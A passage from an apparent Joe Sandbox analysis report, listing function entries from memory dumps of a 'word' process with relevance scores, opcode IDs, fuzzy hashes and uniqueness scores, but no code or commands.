                        • Instruction Fuzzy Hash: 5D01A539305108ABDB115E96EC84EEB7B5EFB85325F10803DFA0AC7351CA718C10D751
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B2BB5 Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c9d1dcd677d372ff41ed8027649284dc858523edc04b4645b6d0be05b653d149
                        • Instruction ID: ab59c29777df1bc67b2da3ba797073c3aee6822f0af4d589ad9c1513855c10ca
                        • Opcode Fuzzy Hash: c9d1dcd677d372ff41ed8027649284dc858523edc04b4645b6d0be05b653d149
                        • Instruction Fuzzy Hash: EE211A38A00118CFEB25DF64C955B9EB7B2FF84305F1080A9D90AA7389DB34AE41DF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B3730 Relevance: .0, Instructions: 50COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37886137e1687cd671482186241d44ccc0931a822fa421853281de158d2b7e1d
                        • Instruction ID: 778557f1c7775c7851e52199e9c46b45e853137f88fb3c500e681907242efd64
                        • Opcode Fuzzy Hash: 37886137e1687cd671482186241d44ccc0931a822fa421853281de158d2b7e1d
                        • Instruction Fuzzy Hash: BE119E78A001188FD714DB54C509BEE37F2AB88314F2041B9D00AA7B90CB756C41CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B81B7 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c03044aecb0f4c13b477c3dffe96ab7a403ed6c71d9035e51ebaeddca529e404
                        • Instruction ID: a811bc5c3197ab5aa1eb9fdbc81f9999c0275f4fd7125c566c8c95592ec5acaf
                        • Opcode Fuzzy Hash: c03044aecb0f4c13b477c3dffe96ab7a403ed6c71d9035e51ebaeddca529e404
                        • Instruction Fuzzy Hash: F301B16A20D2C96FC7039BB4A8209EA7F79DF87210F0588EAE585CB253C9215915E7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B40C0 Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac983d808286beb3cc9610bb0ff9b453943ea1f3997e660ddea85e2d216d6f0c
                        • Instruction ID: 974e49a264f2995fc4aac00a0b272a12b2308f597822e19a620250b2378ee633
                        • Opcode Fuzzy Hash: ac983d808286beb3cc9610bb0ff9b453943ea1f3997e660ddea85e2d216d6f0c
                        • Instruction Fuzzy Hash: 0E11483CE08288EFC715DB64D962AD87BB1EF45208F10C1AED415EB393DA305D82DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B37FC Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 28bb44564ea7a632b46b7c0d9f811e6311aa38c4099cd98d371a7962d40cc16c
                        • Instruction ID: 666c5c6b344e2aeefea3ea04eae9608750fc0ea79511f9c6f81e7b93b91621a8
                        • Opcode Fuzzy Hash: 28bb44564ea7a632b46b7c0d9f811e6311aa38c4099cd98d371a7962d40cc16c
                        • Instruction Fuzzy Hash: C3118CB8A04154CFE711CBA4C959BA937B2AF49304F1481E9D006EBBA1CB789D41CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C61023 Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b028928c81f82b5940508d141fd9852d42d24862d75024dbe1f7312888aeb924
                        • Instruction ID: a914c1108589f43a74dc606e20f3182ec923d32b257d324191721679e724d4c5
                        • Opcode Fuzzy Hash: b028928c81f82b5940508d141fd9852d42d24862d75024dbe1f7312888aeb924
                        • Instruction Fuzzy Hash: 8F118274A08204CBDB48DF5AE4847AA7BA6FBC9305F148174E01AAB398CB70D952DB45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C605A0 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6c7d589be738fbfb82e3bdf912a5616ec88e15c9088f13f57359cb355d94c85
                        • Instruction ID: 9f8cc9487edb2ae9a307d2a8a7bfdb31d8bdd04eefbd563ea4414c6a7eadd8c8
                        • Opcode Fuzzy Hash: e6c7d589be738fbfb82e3bdf912a5616ec88e15c9088f13f57359cb355d94c85
                        • Instruction Fuzzy Hash: 05113974D0C204DFCB14EFA9D5906ADBBB5FF4A300F2095AAD819A7322E7304A45CF41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C608AC Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a2ff5c066933d4ee7c26d13546c4031da63dfba704f39758fed13a9e4b667139
                        • Instruction ID: 6f537af4f5048ddcb70489cd9c5f71daff28f064342a18c6a57d02b718717f8c
                        • Opcode Fuzzy Hash: a2ff5c066933d4ee7c26d13546c4031da63dfba704f39758fed13a9e4b667139
                        • Instruction Fuzzy Hash: 6C01757070C1048BD758CB5AD4806AB66AAE7CD311F64D068D40EDF789CB30C8169684
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60529 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f46162e388570557c3e656a599f94edd0d5d18fa6b8250802b37746a1ad3457
                        • Instruction ID: c8cae4c03386e82bde0389609fa24587b4a3ac9d64100a363b5ee6e87d4fd746
                        • Opcode Fuzzy Hash: 2f46162e388570557c3e656a599f94edd0d5d18fa6b8250802b37746a1ad3457
                        • Instruction Fuzzy Hash: D30116B4D19209DFCB55DFA9D8442AEBFB4FF4A300F2191AAD81AE7261E7304A41CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BA038 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 370ebc9146ec767c00277f67704e413f64ffaf1661e8f30fc30b59884b1cf6a5
                        • Instruction ID: dd3e4de894838e5d4745b8fbcba8ef2b3f80b56a674509b29012b9616b6650b4
                        • Opcode Fuzzy Hash: 370ebc9146ec767c00277f67704e413f64ffaf1661e8f30fc30b59884b1cf6a5
                        • Instruction Fuzzy Hash: 1311523890110ADFDB19CF90D648BEDB7B2FF48304F148259E405AB354C7B56D85CB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B3A80 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2231c11eeef130bef29543e91d083d9e7f7dd6a5fcada70c7ff4e34bf74df25a
                        • Instruction ID: 2ec72315ffaba3b6b9f6ec4c29978d2247c8a8441fce4a512a96195486f780b7
                        • Opcode Fuzzy Hash: 2231c11eeef130bef29543e91d083d9e7f7dd6a5fcada70c7ff4e34bf74df25a
                        • Instruction Fuzzy Hash: 5B01F778E08908EFCB45DFA5D141ADCB7B1FF85304F2095A9D406D3351E6755A94CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6122F Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae88b940e20ca8fd06ab40151d4e8d6ee8e56ee83894906e4c061725f62a5774
                        • Instruction ID: 444e59884a132968ff13f0c4c5cf2cf62575aadc6558d25ab231096a7284dea3
                        • Opcode Fuzzy Hash: ae88b940e20ca8fd06ab40151d4e8d6ee8e56ee83894906e4c061725f62a5774
                        • Instruction Fuzzy Hash: CB01B570A08208CFDB44DF95E4843EE7BE6FB89305F2481A9D019AB399C775C406CB45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6EE30 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a60a40a07ac56dc077d4bf1dd61e485f36b2470ebe86bda44a387fb134ca256
                        • Instruction ID: 0def12da6c9b98db20e5cf33f333831cbb9e010ced48961894ee2af0e4fc00d9
                        • Opcode Fuzzy Hash: 6a60a40a07ac56dc077d4bf1dd61e485f36b2470ebe86bda44a387fb134ca256
                        • Instruction Fuzzy Hash: 5E014C74D04208EFCB24DFA6D5C5AACBBF1FB88300F20C5AAD41997250D7765E80DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8AE1 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3f091d482717f2d160c3c492ac4ad5389ab8dace7bd158317fd399c28c2c7115
                        • Instruction ID: 560240594d949eba02cf1eb38b58fb416554711b23ef7a1120d9caeeb0e4012a
                        • Opcode Fuzzy Hash: 3f091d482717f2d160c3c492ac4ad5389ab8dace7bd158317fd399c28c2c7115
                        • Instruction Fuzzy Hash: 10F0F639305208ABD7021F55EC808EABF29FF8A355714407AFA09CB351CA614D15D3A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6BE02 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aebfaab80f094bba141d458752a2b999cc4b402a80a3a2852e53e10b91a7cdb5
                        • Instruction ID: d606a41fab2b50ee0021fca2899a34ca3328b8dfde8efd6c50f83974524ae1f9
                        • Opcode Fuzzy Hash: aebfaab80f094bba141d458752a2b999cc4b402a80a3a2852e53e10b91a7cdb5
                        • Instruction Fuzzy Hash: E301813250D2859FC313CF64C8614A9BFB19F4720471894E6D289CF262C6329D52E761
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8237 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38aaa29e0f03565f17dd32b7b9549011eb47214d8d6f3185903ead172bd570c4
                        • Instruction ID: 49907514a862fd4fc455aeffa553282ee4ed822c4bdfec934e985f32d9972652
                        • Opcode Fuzzy Hash: 38aaa29e0f03565f17dd32b7b9549011eb47214d8d6f3185903ead172bd570c4
                        • Instruction Fuzzy Hash: BCF0C23950824CBFC702EFA4C8018AABF7DDF46214B1484DBE9458B312CA329D11E7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60847 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1276e01f2b1fc50c4a8c73cab02f7230a0936332404baf00abc1979850f345f6
                        • Instruction ID: 01b6c922d2b685cacb1b17c82099f9818e82ef52f3ff459b6341d9de530ffc00
                        • Opcode Fuzzy Hash: 1276e01f2b1fc50c4a8c73cab02f7230a0936332404baf00abc1979850f345f6
                        • Instruction Fuzzy Hash: 1B01D67460C2449BCB08DBA5E4907EE7BA6EF89305F208528E405AF3A9DF304A85CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B40D0 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad99cf259a82e5736c54930b9e32c96d8d6c0dd30c255a7887354f0c8a66fcd9
                        • Instruction ID: 3fba2d6c0ebfabc8d6d09ff9ec8faad9788c9748f632bd7d18073c0d5c4474b4
                        • Opcode Fuzzy Hash: ad99cf259a82e5736c54930b9e32c96d8d6c0dd30c255a7887354f0c8a66fcd9
                        • Instruction Fuzzy Hash: CD017C3CE04108EBC744DF64DA52AE8B7B2FF84208F10C16DD405E7352DA305E81DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F45F2C Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522177543.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fd8aac872e03e5706162177ec75b30dcbaca9dd9154b328132557c10564c539
                        • Instruction ID: 62e0e1d10855191878d5191c2c8ba0109d77052940c7c2c087c7d49327650786
                        • Opcode Fuzzy Hash: 8fd8aac872e03e5706162177ec75b30dcbaca9dd9154b328132557c10564c539
                        • Instruction Fuzzy Hash: 62F0E932B04535DBDF36266AA9045393E66EBC7B723248079DC0AC7345CA728D46F793
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C62041 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cff1d084be2a12fff1bb5dd0589d867b40174992478ee4ef72e6b75873d28ac
                        • Instruction ID: e95c83bce1e2303eba9c0f04aebac8abeee1549137e005368388f549ebe41555
                        • Opcode Fuzzy Hash: 5cff1d084be2a12fff1bb5dd0589d867b40174992478ee4ef72e6b75873d28ac
                        • Instruction Fuzzy Hash: C0016D70E04248CFCB14CFAAD4C05DDFBF2AF89320F288169E418EB2A4EB309941CB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60478 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b2d02229c4628d4fe649873f46f5c57918f2bd4c2f4b941f69ffa8afebac2775
                        • Instruction ID: bbbf7ee0ee6698ce811e6d508b68dcd2eaedaada421d6ce26d13e6625a4bf011
                        • Opcode Fuzzy Hash: b2d02229c4628d4fe649873f46f5c57918f2bd4c2f4b941f69ffa8afebac2775
                        • Instruction Fuzzy Hash: 39014670909248EFCB58EFB4D9496ECBBB4EF46304F1080AAC419EB262DB340B44CB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60538 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7723072407a3b68bed71c5b2b647661d025bbe5f2984d0f10f74e7c1d753a796
                        • Instruction ID: a2796a1503574129de93eaf7027311585d171e8004797461305981b8517be324
                        • Opcode Fuzzy Hash: 7723072407a3b68bed71c5b2b647661d025bbe5f2984d0f10f74e7c1d753a796
                        • Instruction Fuzzy Hash: A501F6B4D19208DFCB14DFAAD8842AEBBF9BB49300F209169981AA3310E7305A41DF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C61FF9 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 494a5477695b7b4c969064ec151aaaa9b8d1cf02a32fd26d0b96846c5a1a67f1
                        • Instruction ID: 81a46ac4ca81fb5cd71761babc8cc277b0020ca8518bfaf68cfc154f4e565b56
                        • Opcode Fuzzy Hash: 494a5477695b7b4c969064ec151aaaa9b8d1cf02a32fd26d0b96846c5a1a67f1
                        • Instruction Fuzzy Hash: 48F0E774E05208DFCB14DFEAD4C05ADBBF2AF88311F289029E409EB264E7349D45DB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BD698 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1074df45d1e292f0dc9ce2b4e2a6ca54fe237ac120a11f87653adc8aa7051401
                        • Instruction ID: 87065af66b582da41717b7a0cf3eb50b3ed46820c15337ddacf43a0448a5facc
                        • Opcode Fuzzy Hash: 1074df45d1e292f0dc9ce2b4e2a6ca54fe237ac120a11f87653adc8aa7051401
                        • Instruction Fuzzy Hash: AAF0A72D3052587F8313276668458BB7B6AEFC6629314416FF405D7743D9245D01C3E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B31AB Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f98dbf839ae5cd420f365a9ab40d549fbaba86d003b2f17f6dc070aad32fd1ac
                        • Instruction ID: 3399a8f234f1d77ec6768cfdc22e69c7e76aba9c9468ca16cb0fe410f9baafc3
                        • Opcode Fuzzy Hash: f98dbf839ae5cd420f365a9ab40d549fbaba86d003b2f17f6dc070aad32fd1ac
                        • Instruction Fuzzy Hash: AEF03A25F901858BDB26ABF488663BEB5A25BC8718F20446DD116AB794CF784C018BE6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8D4F Relevance: .0, Instructions: 30COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e930270a5bec4a0eace2f97c5011f6b4e98dd0c28cf4be556c894c05cd572f5d
                        • Instruction ID: ce8c14bbf7c86788cabddf05db5e17dfa8fd862bb9578aa8dab9e6d2f4f94fda
                        • Opcode Fuzzy Hash: e930270a5bec4a0eace2f97c5011f6b4e98dd0c28cf4be556c894c05cd572f5d
                        • Instruction Fuzzy Hash: 80F0823920510CAFCB169E85F844FE6776EEF89310F04802AF90987351CA759D91D791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C679F7 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6114b16bc954cebe9ac330839bdb0a667a22caabde7e12100bef3760d4c82c82
                        • Instruction ID: eeb11afcb4ba14f7c3c9ddcbf1bf3a3bb800891b8500a058927013d7357fa082
                        • Opcode Fuzzy Hash: 6114b16bc954cebe9ac330839bdb0a667a22caabde7e12100bef3760d4c82c82
                        • Instruction Fuzzy Hash: BCF08C3021C2414BC728EB75E8908BFB35A9EC5324300CF2CD1668B2E1CF60694A9B90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C679F8 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a09e1d52cf32935346c1e24957e6e4d1a1ebc937fa1b9297dfb2f6042e40aa81
                        • Instruction ID: cef1eed219fb46d790a3a6725cc3b942c2184e8ad6725800bb8de1006c0a408d
                        • Opcode Fuzzy Hash: a09e1d52cf32935346c1e24957e6e4d1a1ebc937fa1b9297dfb2f6042e40aa81
                        • Instruction Fuzzy Hash: 63F030302182414BC618EB76E99187FB35BDEC5334700CF38D1668B2E1DF74694A9BD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C67AB1 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1a1148e804cb8b83fe3b8c02c2237e65afc5fd1d6382dce0d42ea0705a86eeb
                        • Instruction ID: e285a701d5f0e36734703d05550e58da1e6f8e1419ec550d3102c35df258be97
                        • Opcode Fuzzy Hash: b1a1148e804cb8b83fe3b8c02c2237e65afc5fd1d6382dce0d42ea0705a86eeb
                        • Instruction Fuzzy Hash: CFE09B72A0D0086FCB11EFB4A5416ED7795DBC0318F104BBBD509D7551DB310B54AB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BC075 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d31a6c4375e99d4ecc575b6c6d003ede6a406144c44910dcaaaf258f225bd5b0
                        • Instruction ID: 6355df539507fefe29c9f47de4196b758688d8e8dc62f01b8f57bf544f13a6de
                        • Opcode Fuzzy Hash: d31a6c4375e99d4ecc575b6c6d003ede6a406144c44910dcaaaf258f225bd5b0
                        • Instruction Fuzzy Hash: 7AF0127960E3D15FC3438B18C8615967F70EF96114B1A84DBD480CB6A3D6208C1AC7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BA9B0 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c07fcbe90ba5a336eeb2ebbda34570a304502fa59702d09183ca1826828879c8
                        • Instruction ID: af792595eda68eef797d3938ae541d8d9f9d0daa077ac789ea1b5c650c7a8deb
                        • Opcode Fuzzy Hash: c07fcbe90ba5a336eeb2ebbda34570a304502fa59702d09183ca1826828879c8
                        • Instruction Fuzzy Hash: 58E09A311082E87FC302CF9998109B6BFFC9E8E51470880CBF894CB292D669DE02D7B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B9CC1 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 59dfa23d30950b302189b670bdee2c4c262a7e035a05490647a1b0c91fb28e77
                        • Instruction ID: c79c6e5ff17c6287b09c16cff85fa09eb5c9ba35a885ff7d957bff0efad93b7b
                        • Opcode Fuzzy Hash: 59dfa23d30950b302189b670bdee2c4c262a7e035a05490647a1b0c91fb28e77
                        • Instruction Fuzzy Hash: 43F0826D40F2C8EFE713D77598515857FA8DB06104B1180E6D240CB593DA744909DFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60BFE Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
